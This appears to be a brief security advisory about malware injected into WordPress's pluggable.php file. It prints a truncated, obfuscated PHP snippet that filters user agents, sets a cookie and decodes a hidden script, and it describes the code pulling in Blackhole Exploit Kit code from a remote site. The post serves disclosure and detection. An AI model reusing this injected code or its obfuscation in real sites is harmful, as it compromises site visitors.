Malware Targeting WordPress Pluggable.php
One of WordPress' core files, /wp-includes/pluggable.php has been targeted as host to a malware payload, according to a security company +Sucuri LLC. What this means is while it is not a vulnerability in WordPress' code, the following malicious code is getting inserted into pluggable.php.
$&;__name = "RANDOMMD5";
if(1>0 AND !preg_match("#(Firefox.3)|(opera)|(chrome)|..(wget)|(yahoo)|(yandex)#i",
$&;_SERVER["HTTP_USER_AGENT"]) AND empty ($&;_COOKIE[$&;__name])) {
error_reporting(0);
$&;date = date("D, j M Y 00:00:00", time()+60*60*24*30);
$&;cookie = time().".".rand(1111111, 9999999);
echo "<script type=\"text/javascript\">document.cookie = \"".$&;__name."=
\"+escape('".$&;cookie."')+\"; expires=".$&;date."; path=/\";";
$&;__f = implode("", array_map("chr", explode(" ", "98 97 115 101 54 52 95 100
101 99 111 100 101")));
echo $&;__f("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmluc..
Once the malicious is inserted, it then attempts to load more exploit codes from a remote site ending with co.tv TLD, and from there, Blackhole Exploit Kit is used to further exploit the user.
It is unclear at this point how the code is inserted.
To make sure your WordPress site has not been infected with this malicious code, check your /wp-includes/pluggable.php file at around line 810. You can also use Sucuri's SiteCheck scanner to help find this and other malicious code.
And be sure to read Sucuri's post on how the malicious code works.
See Also:
Website Malware Removal – Blackhole Exploit
Understanding Conditional Malware – IP Centric Variation